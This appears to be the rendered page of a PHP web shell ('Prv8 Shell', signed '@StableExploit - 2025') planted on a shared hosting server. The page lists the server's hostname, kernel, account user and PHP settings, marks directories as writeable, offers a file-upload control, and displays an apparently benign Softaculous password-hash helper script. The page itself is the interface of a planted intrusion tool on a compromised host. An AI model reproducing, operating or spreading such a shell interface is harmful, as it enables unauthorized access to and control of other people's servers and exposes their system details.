Prv8 Shell
Server : Apache
System : Linux ecngx264.inmotionhosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : lonias5 ( 3576)
PHP Version : 7.3.33
Disable Function : NONE
Directory :  /var/softaculous/unmark/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/softaculous/unmark/update_pass.php
<?php

function __generateToken($len=20){
    $token  = NULL;
    $chars  = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $i      = 1;
    while ($i <= $len) {
        $token  .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
        $i      += 1;
    }
    return $token;
}

function __generateHash($str){
    $salt = __generateToken(50);

    if (CRYPT_SHA512 == 1) {
        return crypt($str, '$6$rounds=5000$' . $salt . '$');
    }

    if (CRYPT_SHA256 == 1) {
        return crypt($str, '$5$rounds=5000$' . $salt . '$');
    }

    if (CRYPT_BLOWFISH == 1) {
        return crypt($str, '$2a$07$' . $salt . '$');
    }

    if (CRYPT_MD5 == 1) {
        return crypt($str, '$1$' . $salt . '$');
    }

    if (CRYPT_EXT_DES == 1) {
        return crypt($str, '_J9' . $salt);
    }

    if (CRYPT_STD_DES == 1) {
        return crypt($str, $salt);
    }

    return false;
    // Throw exception once everything is hooked up
}

$resp = __generateHash('[[admin_pass]]');
echo '<update_pass>'.$resp.'</update_pass>';

// We do not need this file any more
@unlink('update_pass.php');

?>

@StableExploit - 2025